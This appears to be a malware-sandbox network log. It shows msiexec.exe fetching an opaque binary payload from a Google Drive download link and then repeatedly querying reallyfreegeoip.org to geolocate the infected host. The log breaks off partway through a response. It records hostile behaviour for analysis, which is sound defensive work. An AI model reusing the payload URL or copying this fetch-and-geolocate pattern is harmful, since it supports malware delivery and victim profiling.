                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                    Connection: close


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    1192.168.2.749976172.217.16.1294438180C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-02-20 19:02:26 UTC258OUTGET /download?id=1op1yD792kZI-PIBIgKY8tFU8QiYMScoB&export=download HTTP/1.1
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    2025-02-20 19:02:29 UTC5020INHTTP/1.1 200 OK
                                                                                                                                                    X-GUploader-UploadID: AHMx-iFLv0c4QTLbwyjg_oeTWVOEp4u498eVXP_QAig4HDh3y5zurQAxN7wEefoyGRGLboz0-A_doVU
                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                    Content-Security-Policy: sandbox
                                                                                                                                                    Content-Security-Policy: default-src 'none'
                                                                                                                                                    Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                    X-Content-Security-Policy: sandbox
                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                    Cross-Origin-Resource-Policy: same-site
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    Content-Disposition: attachment; filename="knRcZfRKst249.bin"
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Access-Control-Allow-Credentials: false
                                                                                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Content-Length: 278080
                                                                                                                                                    Last-Modified: Thu, 20 Feb 2025 13:18:44 GMT
                                                                                                                                                    Date: Thu, 20 Feb 2025 19:02:29 GMT
                                                                                                                                                    Expires: Thu, 20 Feb 2025 19:02:29 GMT
                                                                                                                                                    Cache-Control: private, max-age=0
                                                                                                                                                    X-Goog-Hash: crc32c=XnXuZg==
                                                                                                                                                    Server: UploadServer
                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                    Connection: close
                                                                                                                                                    2025-02-20 19:02:29 UTC5020INData Raw: b5 6c 71 7e c0 37 66 81 a2 14 f6 03 cb b5 4c 2a 4e d5 23 db 11 f7 b0 93 9b be 7c 45 ab 63 45 8e d1 e3 59 9c f4 ce 1b f3 ab 19 d9 88 72 b2 ed 06 1c 09 cd 57 75 c2 29 4f 3b 0d 56 b1 a3 ce e5 2f cf 19 dd 4b 18 4f f7 e5 e0 e4 4e aa 8b 34 88 d5 b1 ac 93 ba 97 63 d8 4f 0b 1f aa bc f1 a1 73 c2 e9 ec ec bc 72 84 f9 3a ba ad b7 eb 0a bd ac 4f 3c 1b c2 33 69 f2 a5 f9 a3 b8 ba 4a e6 ea 75 e1 02 3b fb f5 f7 d0 02 4d bb 93 a4 ff 38 8f a0 7b 58 f5 b0 1a 04 1a 3e ba 99 1a b6 58 4c 23 d6 0d 90 59 53 d3 a0 b3 c1 ff ef 7f 49 ce b9 9b 69 bb 6e 2a 83 01 f3 ac e9 ca 67 92 9a c6 21 64 47 46 5b e4 ea 8b 2c f5 03 2b c3 f8 8e 50 38 24 49 d3 ed fd 80 5c eb 17 6b 6f a3 e3 73 e9 ac ed a9 7e d5 6f aa 4c aa f9 28 6c c6 3d 4d 94 09 76 54 38 44 80 87 6d 95 15 2c 4d b6 6a 60 e7 df 5f 37
                                                                                                                                                    Data Ascii: lq~7fL*N#|EcEYrWu)O;V/KON4cOsr:O<3iJu;M8{X>XL#YSIin*g!dGF[,+P8$I\kos~oL(l=MvT8Dm,Mj`_7
                                                                                                                                                    2025-02-20 19:02:29 UTC4654INData Raw: 5c 05 e8 55 a1 7c 9d 8e fe 2b 1d e6 31 ad 2c 27 78 1c 91 7f ce 61 75 fe 2b 9b 36 5f 2f 35 2c 6d 0f 10 3b 66 e5 3c 87 86 ba 94 3e 78 8c 1a e9 f6 dc 7f 7f 54 5c 37 a2 ec 84 e3 12 2b 73 27 b1 8e ec e9 eb 57 a7 9d 05 03 76 6f 0f f3 f7 02 ae 7a 6a ef c2 b6 e9 ce 65 91 33 bf 3e e8 08 f7 5a 2d 19 de 11 29 bb ae 6f db 5a 46 b8 70 84 70 8a 41 6a 9c 53 19 a8 43 95 5c 7c 14 f7 93 a3 1a b9 f7 e0 e2 2c 8d d1 f4 85 56 0d a3 9c e1 99 38 87 a5 6a c5 2e d4 12 ed 3b 34 af dd 62 78 bb 8e 62 7a 40 dc 30 74 e1 bc 2d 83 6c 32 3b d1 fa 87 a0 94 7c d8 09 46 35 e8 7a c3 6a 3d e7 0a 15 80 84 bd e8 de 1a 69 c4 fd f9 5e dd 52 03 02 35 c1 84 b1 bb e2 37 d4 07 26 f8 16 34 74 5a ac 7b 94 8a 61 e9 c4 ae 34 e5 0e 0d ee 32 e7 fd b4 b5 0d be 93 ff 5b a2 0f 1f 41 61 5e 12 c1 bd b0 d4 49 78
                                                                                                                                                    Data Ascii: \U|+1,'xau+6_/5,m;f<>xT\7+s'Wvozje3>Z-)oZFppAjSC\|,V8j.;4bxbz@0t-l2;|F5zj=i^R57&4tZ{a42[Aa^Ix
                                                                                                                                                    2025-02-20 19:02:29 UTC1326INData Raw: b4 b4 33 a3 1e bc 5b fb 0e 31 33 13 6b 1d c1 cd 12 f3 5e 1f 57 48 56 6f 9f de b1 80 39 0e a9 42 59 24 71 77 26 69 e9 03 b2 38 bb 49 1a 1d 6f f6 ab 0c e6 60 9d 31 16 29 21 6b 31 cb da df 64 e4 f6 a9 a2 63 09 0e 44 86 80 3f 37 4f 63 72 bf fd 1c be e0 6a 73 2a 5d ec 12 0b e8 99 a8 6c 5c 8e 5b 5d c1 79 66 83 30 ad 02 ad c3 da 56 10 ca 36 68 62 7a 5a d0 d6 d4 47 b4 74 35 07 38 ed 4d 33 ea 64 2b 6c 08 ae c8 3a 3e 7d 03 7a d1 0c 33 60 18 16 5a 07 e4 97 8b 97 e8 1e 96 da 08 5d 38 81 d4 fc 00 22 a7 7e 77 85 2b 4e 0d 5a 79 5f 9c 44 d2 55 1b d7 9b f1 4b 55 79 29 ae 7e 71 82 16 ac 63 43 24 11 d8 95 09 12 10 ef b9 9f 89 aa 75 30 0f eb 51 f8 b3 71 14 3a 72 a1 4d d6 1f 4d 89 54 7c 27 63 35 2f 3e 81 79 fb 31 dc 0b 11 8b 78 00 05 7c e6 ac dc f5 67 09 61 a0 46 68 b9 03 48
                                                                                                                                                    Data Ascii: 3[13k^WHVo9BY$qw&i8Io`1)!k1dcD?7Ocrjs*]l\[]yf0V6hbzZGt58M3d+l:>}z3`Z]8"~w+NZy_DUKUy)~qcC$u0Qq:rMMT|'c5/>y1x|gaFhH
                                                                                                                                                    2025-02-20 19:02:29 UTC1390INData Raw: 33 bf 74 99 7a 70 40 2d 6e 7b 5b 56 93 18 65 dc 3f 8d 9d 68 fc 06 f2 41 1a 34 7a 00 f3 9e 95 5c 7c a5 d6 89 c0 7f a3 e0 e3 2c 04 fa db e7 8a f4 34 d1 ef 8c 93 2b 93 c4 e1 c6 28 a6 03 9c 3b 34 a1 f5 f5 76 bb 95 16 e3 5a cd 46 33 a3 bc 2d 8f 7d f0 3b c1 bd ad a0 94 70 d5 0a 3f 34 f9 7f ca 4a 18 e2 65 1e 93 9b b7 c0 60 c4 67 ce 32 fd 72 d5 43 07 13 00 c1 84 bf c9 ab 3c fc 07 30 d0 9f 3e aa 5c ba 82 b9 9e 46 97 e5 97 fa ef 0e d1 c0 42 e7 fd be a9 b4 ff 93 fd 5a de 19 66 1e 6e 50 62 63 98 a7 fe ff 37 e1 42 f4 40 25 89 fc fd 6c 71 0b 17 e2 7f 50 09 1e 6d 4b 22 0a 6f d8 34 63 62 cd a3 12 57 d7 1e b7 35 b4 08 9f 3c aa b6 5d a0 c6 bc 23 81 d5 69 66 58 2b da 8a 2c 1c 59 e6 3a 31 94 77 f4 36 18 92 32 5d 9c b8 41 3e b1 1e 66 4f 80 e8 7c d0 1d 3a 02 59 b2 fe 88 da ae
                                                                                                                                                    Data Ascii: 3tzp@-n{[Ve?hA4z\|,4+(;4vZF3-};p?4Je`g2rC<0>\FBZfnPbc7B@%lqPmK"o4cbW5<]#ifX+,Y:1w62]A>fO|:Y
                                                                                                                                                    2025-02-20 19:02:29 UTC1390INData Raw: e9 9f 8e 46 3c 35 65 3f ad 26 31 86 1d 82 7a df 64 4c b9 2b 9b 36 5f ec ca 2a 50 d7 11 3d 15 96 3c 87 8c d4 f0 3e 79 9d 2a 99 34 6d 7f 75 47 49 26 a4 83 be e3 3a 4a 00 e4 bb 85 e1 ae 75 57 a7 9d 06 7d 2c 00 ca f9 98 6e d0 47 60 ef c1 c6 3f 43 04 9b 33 af 57 fd 8f e7 50 5d 36 6f 7e 41 b1 dc f8 cc 35 5f 90 2b 8e 1f ea 2e ad 96 5f 13 db 39 93 47 fb 46 f3 93 b3 3b a7 92 5c 9d 2c fd 79 c2 97 7e aa a6 ef 86 3b 1d 95 c4 39 db 28 a6 df a6 22 4a 9d dd bc 72 19 ba 7e 24 a3 dd 36 6b 42 94 5a 89 6c e4 45 1d 95 e8 aa 94 08 fe d7 48 31 8a 92 ef 62 26 f1 62 05 86 eb 66 e8 02 ce 76 c3 83 2e 72 d5 49 07 13 08 c1 84 bf c8 f7 3e fc 7d 35 f0 62 0f aa 56 a8 0e 2d 8f 66 f6 d3 86 b7 ef 0e db fe e6 e6 ee bd a5 30 92 9f ec 53 ec 60 de 25 61 5a 12 c1 96 bb d6 58 3f f7 27 9c 65 3d
                                                                                                                                                    Data Ascii: F<5e?&1zdL+6_*P=<>y*4muGI&:JuW},nG`?C3WP]6o~A5_+._9GF;\,y~;9("Jr~$6kBZlEH1b&bfv.rI>}5bV-f0S`%aZX?'e=
                                                                                                                                                    2025-02-20 19:02:29 UTC1390INData Raw: 1a 93 3b 49 25 68 a6 67 6c f6 58 ac ca 0b d9 27 90 a7 c6 b3 6a ca c2 93 5e 16 1a ca 5a 78 76 16 98 1c 75 13 35 f1 fd 72 1a 54 18 a1 95 2e cb fd 52 18 99 76 2b 37 e3 f3 69 29 75 03 ce f4 5a 47 de fa 1a 7f 30 b9 3f 1b 91 f4 06 b6 7f a3 53 21 f1 2b 82 7c 9d 8a 94 0f 07 94 46 a2 2c 57 da 39 8a 01 d2 61 75 fa 45 75 36 5f f2 96 09 71 a5 24 2f 66 85 9e af f1 fc 94 34 72 bf 9d ea f6 67 78 10 08 4f 37 a8 f1 8c e9 11 4e 75 0d a0 b5 e2 c1 67 50 a7 97 26 6c 2a 7e 0f 87 84 64 ae 7e 0f 01 c5 a9 f3 31 5e 90 33 ce 47 a7 8b f7 50 27 08 27 7d 4b bd 97 d1 db 35 2f c6 43 8e 1f e4 33 ff 94 5f 69 cd 00 16 5c 76 0d e5 6d b3 15 b6 d9 b7 8f 2c 8d cf 37 d6 56 1c a7 c7 a1 99 38 87 c4 75 c4 28 a6 6a 0e 38 34 a5 dc 99 60 c5 db 64 56 4c e5 32 1b e0 ba 42 32 6c ee 20 a7 80 fd a0 e4 5e
                                                                                                                                                    Data Ascii: ;I%hglX'j^Zxvu5rT.Rv+7i)uZG0?S!+|F,W9auEu6_q$/f4rgxO7NugP&l*~d~1^3GP''}K5/C3_i\vm,7V8u(j84`dVL2B2l ^
                                                                                                                                                    2025-02-20 19:02:29 UTC1390INData Raw: 01 ba c8 aa fd c3 4d e1 1f b4 4b 62 f6 fb 19 44 96 8b 39 d3 cf ce bb 3e b3 72 b5 49 1c 03 c8 9f 36 bc 04 b2 db d7 3c 07 a2 43 c7 4e cc f8 7c 6c a0 f7 41 40 e3 37 26 4b 98 11 6f b7 61 ce 88 41 87 d8 0a 57 32 fc ab 2e 7d ea be 12 b9 f3 a1 af 90 ec 5f 68 0c aa 61 d3 07 71 6d 16 fb 74 bb fa 78 c0 a9 f3 cd 83 6b 6b da c8 93 4e 0e 74 13 d3 e6 7c 09 08 0d 6f 02 3f d7 e8 6b c8 3d 77 ff 8a 2e c1 ec 43 1f 7b 9b 2b 37 e8 d6 6e 43 13 cc ce 84 f2 71 d2 c3 b7 10 4b b3 9d 34 9a 9c 42 a3 0c 78 f1 04 e2 46 a6 6d 81 e1 4b 2a 1d ec 2c b0 3d 3b 17 b1 91 7f c4 61 64 e4 45 37 36 5f f2 34 3d 76 b8 ca 3b 66 ff 3c 87 be 3f 94 3e 79 97 2a fc de 15 7f 7f 5e 4f 17 a2 f1 84 e3 12 37 73 27 b1 85 f7 4c f0 57 a7 96 23 7a 58 fb 04 f9 e8 4c ec 7a 60 e9 67 8c ee 3d 41 91 33 ba f3 aa 10 85
                                                                                                                                                    Data Ascii: MKbD9>rI6<CN|lA@7&KoaAW2.}_haqmtxkkNt|o?k=w.C{+7nCqK4BxFmK*,=;adE76_4=v;f<?>y*^O7s'LW#zXLz`g=A3
                                                                                                                                                    2025-02-20 19:02:29 UTC1390INData Raw: 29 34 3e cf 4d c0 cf b3 99 34 b3 6a 6a 7f bb 9c ff 17 f7 61 b1 d3 d4 07 cf dc 9c bf 4f 73 3c f0 6c 51 a6 c0 5d 5d 96 0d 3c 9b f7 8d 46 39 4f f8 e9 4b 50 ca ec 21 b0 ad 3a f6 79 4d e0 e3 88 9a 22 92 e1 ff e1 d5 83 43 4b 26 3b ac 89 ea a5 7e 50 9f 22 07 18 ed 9a f6 96 42 eb 6f 07 7a 53 5c c3 19 4e 81 3f 6e f8 ac ff c8 40 ee d0 90 56 10 14 d9 9f 42 0f 37 86 7c e2 2a 0d c1 f6 9d 70 dd f8 06 2b aa f7 41 40 fc 28 3f dd 83 1f 07 77 11 a1 54 41 87 d5 65 be 68 fc a1 29 65 f5 c7 46 37 9a c4 e2 89 fd 4d 1a 90 d4 cd a3 68 ac 6d c8 fd 74 a3 ce 6e d0 48 9b a7 ec b9 6b 06 1c 80 7a 3e 2f ca d3 ec 65 1e 12 34 17 13 26 cb 24 1d 40 54 18 a1 8a 2e b5 de 52 05 10 45 be 35 e2 a6 69 73 ff 16 ce 8e ee 9c c8 c1 a9 6e 35 8a 4b 3c 89 86 2d 96 7f d3 f5 76 89 45 ba 0c 8b a6 b5 2a 1d
                                                                                                                                                    Data Ascii: )4>M4jjaOs<lQ]]<F9OKP!:yM"CK&;~P"BozS\N?n@VB7|*p+A@(?wTAeh)eF7MhmtnHkz>/e4&$@T.RE5isn5K<-vE*
                                                                                                                                                    2025-02-20 19:02:29 UTC1390INData Raw: 70 19 16 03 a3 57 1b e2 ba 85 d9 72 41 97 e0 56 b2 a9 4c b2 f0 bc 6b 0d fa b8 50 91 3c f6 e7 d2 5b dc 50 40 b8 fd 6f 8e 44 0d c9 2a 78 6a 80 d1 3f e7 3b e5 37 ab 8e 7c 1c 32 01 69 dd 22 d1 73 95 18 7a f0 61 80 63 b7 65 8b 11 3b 49 34 bb a0 c0 5e 67 6c 34 3a e1 07 1d ba b8 3b 20 82 56 76 c3 bb 96 e6 43 73 49 d3 d2 df 0d 16 ae cb af 4f 03 2d 79 6c 51 a8 b2 cf 21 d4 7d 2a b7 0a ce 46 33 5d 75 56 58 71 d1 a2 a7 7e ad 30 f6 79 4d e0 e3 88 9a 22 92 e1 ff e1 d5 83 43 4b 26 3b ac 89 ea a5 7e 50 9f 22 07 18 ed 9a f6 96 42 eb 6f 07 7a 53 5c c3 19 4e 81 3f 6e f8 ac ff c8 40 ee d0 90 56 10 14 d9 9f 42 0f 37 86 7c e2 2a 0d c1 f6 9d 70 dd f8 06 2b aa f7 41 40 e3 0d 2c de ab 75 68 b6 34 b7 2c 06 90 d2 7a dd 4d eb 83 92 6c fd db ec 9c eb d9 e9 86 fd 37 b8 bc a2 1f 9b 68
                                                                                                                                                    Data Ascii: pWrAVLkP<[P@oD*xj?;7|2i"szace;I4^gl4:; VvCsIO-ylQ!}*F3]uVXq~0yM"CK&;~P"BozS\N?n@VB7|*p+A@,uh4,zMl7h
                                                                                                                                                    2025-02-20 19:02:29 UTC1390INData Raw: c1 1b a1 9a a3 d6 f4 00 21 d9 df 10 37 48 0c 12 d3 ed f7 ef 9b 0b 17 63 6e b9 ee 51 c0 ba c5 dd 56 63 7b aa 46 d8 98 3a 6c 78 53 12 94 09 5c 3b f0 44 e0 89 6d bd 61 6c 4d b0 59 6d cf aa 5d 37 f4 0f 81 a5 cd 77 9e 32 9d e8 33 8b 82 f5 80 5c 04 54 7b 46 1f 75 88 dc 86 6b 40 95 83 fe b6 94 81 ea 84 e9 ae 3e 41 e2 94 52 af df ab 0a 2e 2d f6 9d 03 ac c6 22 2b c5 2e 1f 2c 66 7a d8 26 1d 19 a8 a6 35 f6 21 84 c1 cf a3 1b 62 5d 7f 76 d9 0a 9c 5b dc 12 08 f3 02 35 01 c4 c7 a3 52 31 26 e1 aa bf db 4b 31 15 34 3a e3 74 09 cf b9 31 33 b6 00 73 c3 bb 98 87 f6 71 61 c1 c4 f7 84 c8 ae c1 b9 b1 02 40 5f 7d 43 80 cc 4b 32 c3 62 f6 9f 89 c4 46 39 60 80 57 5a 41 d6 ec 54 b0 ad 3a f6 51 06 f1 9d bc 87 af d7 c9 34 e0 f0 9f 5e ae 30 3b d6 2b de a3 28 dc 9f 22 09 c4 f3 82 84 c7
                                                                                                                                                    Data Ascii: !7HcnQVc{F:lxS\;DmalMYm]7w23\T{Fuk@>AR.-"+.,fz&5!b]v[5R1&K14:t13sqa@_}CK2bF9`WZAT:Q4^0;+("


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    2192.168.2.749978104.21.32.14438180C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-02-20 19:02:32 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    2025-02-20 19:02:32 UTC866INHTTP/1.1 200 OK
                                                                                                                                                    Date: Thu, 20 Feb 2025 19:02:32 GMT
                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                    Content-Length: 362
                                                                                                                                                    Connection: close
                                                                                                                                                    Age: 309920
                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                    cf-cache-status: HIT
                                                                                                                                                    last-modified: Mon, 17 Feb 2025 04:57:11 GMT
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2%2F9K%2FInSWnKesd451Cr26Y%2BFxhy8eZ%2FyiiEvaXnHZivk2JD8n3fPUmG9oak%2FkNlzKBBZ9GWpEgAuit5BeGZdP1tfNcYk%2FdxBsb%2FSY6i%2FBNNSu52s0TMOPLr9nq2sYtg7xIbLgwn%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 9150c063acb0c327-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1641&min_rtt=1634&rtt_var=627&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1723730&cwnd=215&unsent_bytes=0&cid=dc2fd6939ebd701d&ts=152&x=0"
                                                                                                                                                    2025-02-20 19:02:32 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    3192.168.2.749979104.21.32.14438180C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-02-20 19:02:33 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                    2025-02-20 19:02:33 UTC854INHTTP/1.1 200 OK
                                                                                                                                                    Date: Thu, 20 Feb 2025 19:02:33 GMT
                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                    Content-Length: 362
                                                                                                                                                    Connection: close
                                                                                                                                                    Age: 309921
                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                    cf-cache-status: HIT
                                                                                                                                                    last-modified: Mon, 17 Feb 2025 04:57:11 GMT
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QiJv%2FnTPnwiypFByxtbYR9sVNS%2B3TbPDKxKkOee0N120gWAOIIjnzbydaRETEH8xumJq4ourdCUxOAa7SouH0hTHLd4kmwfrUYH94%2FYv00dgaFBmfzVm5uPumEHaGEilpXnZ6FZm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 9150c0690c184344-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1678&min_rtt=1671&rtt_var=641&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1686886&cwnd=137&unsent_bytes=0&cid=83a4e92e1b00e6e4&ts=170&x=0"
                                                                                                                                                    2025-02-20 19:02:33 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    4192.168.2.749981104.21.32.14438180C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-02-20 19:02:34 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    2025-02-20 19:02:34 UTC850INHTTP/1.1 200 OK
                                                                                                                                                    Date: Thu, 20 Feb 2025 19:02:34 GMT
                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                    Content-Length: 362
                                                                                                                                                    Connection: close
                                                                                                                                                    Age: 309922
                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                    cf-cache-status: HIT
                                                                                                                                                    last-modified: Mon, 17 Feb 2025 04:57:11 GMT
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sLZaMAfy8NIQ7EvXOirffFPPJwVcjzVgg7SlPuaTKIos5m0lNbdNzkjlPsVvv3A67BdLqKtmjQLne8cIbXoY7NfagenB4o94JIG67V%2BWrY9cDhd1VdsptSyuXpxJMs5hcOhr4ExM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 9150c0715fec4344-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1714&rtt_var=648&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1682027&cwnd=137&unsent_bytes=0&cid=046bd5d80ffc8665&ts=156&x=0"
                                                                                                                                                    2025-02-20 19:02:34 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    5192.168.2.749983104.21.32.14438180C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-02-20 19:02:35 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    2025-02-20 19:02:35 UTC858INHTTP/1.1 200 OK
                                                                                                                                                    Date: Thu, 20 Feb 2025 19:02:35 GMT
                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                    Content-Length: 362
